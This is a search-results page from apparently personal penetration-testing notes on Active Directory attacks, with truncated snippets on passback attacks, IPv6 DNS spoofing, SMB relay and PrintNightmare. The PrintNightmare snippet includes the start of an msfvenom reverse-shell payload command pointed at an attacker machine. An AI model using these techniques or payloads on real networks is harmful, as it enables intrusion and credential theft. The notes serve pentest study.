Advanced Search
Search Results
10 total results found
Active Directory
Also, consider taking a look at my Active Directory Attack Map. While it doesn't cover every possible attack avenue, and isn't as sophisticated as some other mindmaps, I think it does a pretty good job of visualizing some of the information found in this book.
Post Exploitation: Enumeration
Post Exploitation: Attacks
Initial Attack Vectors
Internal: --------- Attack vectors that are ideal for internal penetration tests, where the attacker plants a device on the network or uploads tools to a compromised host. External: --------- Attack vectors that could work in both internal and external ...
Joining Linux Hosts to Active Directory Domain
Session 10: Jan. 18, 2024
Passback Attacks (Internal/External)
What's the Flaw? Usually involves an unsecure device -- like a printer or multifunction device -- which is configured with an LDAP or SMTP client and credentials. It could be a web server too -- where there is an LDAP or SMTP client. The credentials are usual...
IPv6 DNS Spoofing (Internal)
Note: Network Environment This spoofing attack and works by sending a router announcement to multicast ff02::1. Therefore, it will only affect domain-joined hosts on the same segment as the attacker machine. What is IPv6 DNS Spoofing? An attacker announ...
SMB Relay (Internal/External)
Note: Network Environment This attack works best in a flat network. However, as long as the attacker machine and target(s) are routeable and no firewalls are blocking required ports, it could work across network segments. What is SMB Relay? A man-in-the-m...
PrintNightmare (Internal/External)
Remote Code Execution https://github.com/cube0x0/CVE-2021-1675 Contains full details on scanning and mitigation. Could potentially be used against a domain controller for easy access to a reverse shell. Create payload msfvenom -p <payload> LHOST=<kali-i...